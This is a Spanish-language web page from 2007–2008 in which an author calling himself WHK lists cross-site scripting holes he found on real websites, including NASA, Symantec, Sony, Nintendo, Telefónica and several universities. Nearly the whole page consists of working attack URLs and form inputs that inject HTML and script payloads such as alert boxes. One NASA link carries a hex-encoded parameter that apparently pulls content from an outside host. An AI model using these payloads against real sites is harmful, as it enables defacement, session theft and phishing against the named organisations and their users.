He decidido ir en busca de webs vulnerables para verificar en que condiciones nos basamos para crear nuestras webs.

He encontrado algunos XSS en paginas webs de muchisimo presupuesto cosa horrible para un programador ya que ese tipo de cosas son muy básicas aunque no dejan de ser importantes. Ahora les mostraré las webs que yo (WHK) encontré en tan solo unas horas.

Algunas webs vulnerables tales como warzone.elhacker.net, alemana.cl y sii.cl de servicios de impuestos internos fueron omitidas por diversas razones que no daremos a conocer

Mirrors: http://xssed.com/archive/author=whk

La Nasa - por WHK

http://mynasa.nasa.gov/portal/site/mynasa/template.'"><h1>XSS

La Nasa nuevamente - por WHK

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param=%68%74%74%70%3A%2F%2F%77%77%77%2E%6A%63%63%68%61%72%72%79%2E%63%6F%6D%2F%70%72%75%65%62%61%73%2F%6E%61%73%61%2E%67%6F%76%2F%77%68%6B%2E%61%73%78

MTV - por WHK

http://www.mtvla.com/news/droplets/email_story_form.jhtml?title="><h1>XSS

Defcon - por WHK

https://pics.defcon.org/misc.php?action=cookies Editas tu cookie bbsessionhash:%3Ch1%3EXSS+by+WHK%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E

Telefónica - por WHK

http://195.53.169.41/jsp/CDoResult.jsp?QUERYTYPE=32&QUERYTXT=lol&QUERYLEVEL=2&SESION=a';}%3C/script%3E%3Ch1%3EXSS%20by%20WHK%3Cscript%3E%3C!–&NOMLIB=tel_chile_lib|grupo_tel_chile_lib|salaprensa_lib&QUERYSTRING=&IDIOM=&FILEINI=default_cl&SALADEPRENSA=&PAIS=CL

Foros Terra - por WHK

http://foros.terra.com.mx/portada.cfm?s=F&pCat=11"><br><br><br><h1>XSS

Descargas Terra - por WHK

http://descargas.terra.es/index.phtml?&action=all&id_section=1"><script>alert(1) ;</script>&search="><br><h1>XSS

Simantec (de Norton Antivirus) - por WHK

http://www.symantecstore.com/dr/v2/ec_main.entry25?page= ESUpgradeRenewal&client=Symantec&sid=41185&cid=2073aaaa"><br><br><br><h1>XSS%20by%20WHK<br><br><br>

Esest (de Nod32 Antivirus) - por WHK

http://www.nod32.bg/ (en el buscador de arriba poner "><h1>XSS )

Infosecurityevent - por WHK

http://www.infosecurityevent.com/App/homepage.cfm?keywords=%22%3E%3Ch1%3EXSS+by+WHK%3Cbr%3E%3C%2Fh1%3E&appname=100004&moduleid=42&siteadvsearch=1&collections=1%2C2%2C3%2C4%2C5%2C6%2C9&searchtype=all&displaytype=relevance&searchmethod=basic&fuseaction=search.results&go.x=14&go.y=8

Megaupload - por WHK

http://www.megaupload.com/signup/es/index.php (petición POST al valor 'email' "><h1>XSS )

Winamp - por WHK

http://www.winamp.com/skins/search/?s=m&q=;"></script><script>alert(/XSS/);</script>

Imageshack - por WHK

http://reg.imageshack.us/content.php?page=email&q=abuse2/><h1>XSS

Webtaller - por WHK

http://www.webtaller.com/regsystem/login.php?ref=/envios/enviar_articulo.php?id="><h1>XSS

Universidad Surcolombiana (Colombia) - por WHK

http://portal.usco.edu.co:8080/portal/portal/pagina.jsp?id=70"><h1>XSS%20by%20WHK<script>alert(/XSS%20by%20WHK/);</script>&index=1"><h1><br>XSS

Universidad de Chile - por WHK

http://www.uchile.cl/uchile.portal?_nfpb=true&_pageLabel=not&url=42454"><h1>XSS

Pontificia Universidad Católica de Chile - por WHK

http://www.uc.cl/ (donde dice "buscar personas" poner "><h1>XSS )

Universidad Iberoamericana de México - por WHK

http://enlinea3.uia.mx/www/busqueda_uia.cfm?busqueda=%22%3E%3Ch1%3EXSS

Universidad de Buenos Aires UBA (Argentina) - por WHK

http://www.uba.ar/comunicacion/difusion/agenda/encurso.php?dia=7&mes="><h1>XSS7&?o=2007#4106

Universidade de São Paulo USP (Brasil) - por WHK

http://noticias.usp.br/acontece/obterNoticia?codntc=17246&codnucjrn=1"><h1>XSS

Universidad Harvard (Estados Unidos) - por WHK

https://www.pin1.harvard.edu/pin/submit-login (en datos poner "><h1>XSS )

Imageshack - por WHK

http://reg.imageshack.us/content.php?page=email&q=abuse2/><h1>XSS

Sourceforge - por WHK

http://sourceforge.net/search/?type_of_search=soft&words=';"/></script><h1>XSS<script>alert();</script>

Softronic - por WHK

http://zonealarm-antivirus.softonic.com/?refmkt=6aaaaa"><script>alert(/XSS by WHK/);</script>

WikiWix (Buscador Wikipedia) - por WHK

http://es.wikiwix.com/index.php?action="><h1>XSS<br><br>?=es&bg=es

Nintendo - por WHK

http://www.nintendo-europe.com/NOE/es/ES/search/search.jsp?searchText=';}}"></script><h1>XSS<script>alert();</script>&indexName=all

Sony - por WHK

http://www.sony.es/search/Search.action?applicationtype=Search&searchtype=product&site=odw_es_ES?ion=es_ES_Search&start=1&page=ProductMultiSiteSearchResult&shortcut=true&query=';</script><script>alert();</script>&locale=es_ES&brand=default&allSections=true

Meanwhile - por WHK

http://meanwhile.com/?domain=hackxcrack.com"><h1><br>XSS by WHK<script>&

El-Hacker.com - por WHK

http://www.el-hacker.com/top/search.php (en el buscador poner "><h1>XSS )

elhacker.com (elhacker.org) - por WHK

http://elhacker.org/ (en el buscador poner "><h1>XSS )

New-Bytes.net - por WHK

http://md5.new-bytes.net/encoder.php (donde dice codificar poner '"><h1>XSS )

Codebreak.tk - por WHK

http://codebreak.uni.cc/tools/shellcode.php (poner </textarea><h1>XSS )

ElHacker.net - por WHK

http://ns2.elhacker.net/cgi-bin/birdcast.cgi (Crear una referencia con contenido HTML incrustado)

Dimitrix - por WHK

http://www.dimitrix.es/youtube/ (poner </textarea><h1>XSS )

Piojosoft - por WHK

http://www.piojosoft.com/index.php?seccion=programas/buscatop&pclaves=<script>alert(/XSS/)</script>

Portalhacker.net - por WHK

http://www.portalhacker.net/buscar.php (metodo post a un input llamado query ""><h1>XSS " mas el valor "ok " en el valor "buscar")

DarkNet.org - por WHK

http://www.darknet.org/ (metodo GET al input 's' :  ""><h1>XSS ")

BlindSec - por WHK

http://www.blindsec.com/notes.php (Editar el texto escapando con un '</textarea>' y guardando)

Bueno… ante tal anuncio ya varios han solucionado "parte" de sus problemas en sus páginas webs, lo mas curioso es que lo han hecho los que menos recursos tienen.


Página creada el 10 de Agosto del 2007 - Última actualización el 14 de Septiembre del 2008